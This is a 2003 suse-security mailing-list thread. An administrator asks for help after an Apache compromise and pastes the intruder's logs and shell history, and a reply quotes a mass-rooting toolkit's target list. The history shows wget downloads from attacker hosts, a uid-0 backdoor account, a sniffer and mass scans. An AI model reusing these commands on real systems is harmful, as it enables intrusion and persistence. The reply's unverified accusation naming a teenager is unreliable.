quote from "boom.tar.gz" (see if you find somethin' that sounds familiar):
WARNING, this is a powerfull tool you can gain root access on many systems.
Use it at your own risk.
It scans for vulnerabilities in different OS and daemons:
The BIND scan:
Gains root access on all nonpatched boxes running linux with the following
bind
versions:
ISC BIND 8.2
ISC BIND 8.2.1
ISC BIND 8.2.2
ISC BIND 8.2.2-P3
ISC BIND 8.2.2-P5
ISC BIND 8.2.2-P7
The LPD scan:
Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd
from
distribution.
The FTPD scan:
Gains root access on all nonpatched boxes running the following OS/ftp
daemons:
Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
Debian potato [wu-ftpd_2.6.0-3.deb]
Debian potato [wu-ftpd_2.6.0-5.1.deb]
Debian potato [wu-ftpd_2.6.0-5.3.deb]
Debian sid [wu-ftpd_2.6.1-5_i386.deb]
Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
SuSE 7.0 [wuftpd.rpm]
SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
SuSE 7.1 [wuftpd.rpm]
SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
SuSE 7.2 [wuftpd.rpm]
SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
SuSE 7.3 [wuftpd.rpm]
SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
Slackware 7.1
The SSHD scan:
Gains root access on all nonpatched boxes running the followin versions:
Linux:
SSH-1.5-1.2.25
SSH-1.5-1.2.26
SSH-1.5-1.2.27
SSH-1.5-1.2.30
SSH-1.5-1.2.31
SSH-1.99-OpenSSH_2.2.0p1
SSH-1.5-OpenSSH-1.2
SSH-1.5-OpenSSH-1.2.2
SSH-1.5-OpenSSH-1.2.3
OpenBSD 3.x:
OpenSSH 2.9.9 - 33
The RPC scan:
Gains root access on multiple RPC vulnerabilities involving
Linus/SunOS/Solaris.
The TELNED scan:
Gains root access on all nonpatched boxes running the following OS's:
Most of the BSD OS's
The POP3 scan:
Gains root access on all nonpatched boxes running QPOP 3.0b
For further upgrades send me new exploits at k1net1c@k1net1c.net
The SSL scan:
Gains access on almost all linux boxes running OpenSSL 0.9.6d and older.
Spawns a shell uid=apache.
----- Original Message -----
From: "Radu Voicu"
curiosity kills the cat:
http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan Andrei :)
----- Original Message ----- From: "Marco Lum"
To: "suse-security" Sent: Wednesday, September 03, 2003 7:43 PM Subject: [suse-security] Apache Gain Remote Shell Access Help, Help, Somebody help!!!
I Found somebody gain access using wwwrun, Download programs and try to hack into other server.
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip]
0K .......... ......... 100% 65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]
0K .......... ... 100% 3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~.
q
q
}
q
exit
ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh
./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I Can't found where he can get in~~!
-- Marco Lum Net Service Manager
____________________________________________________________________________
_______________
System Development Service Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company HK Service Consultants Limited
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here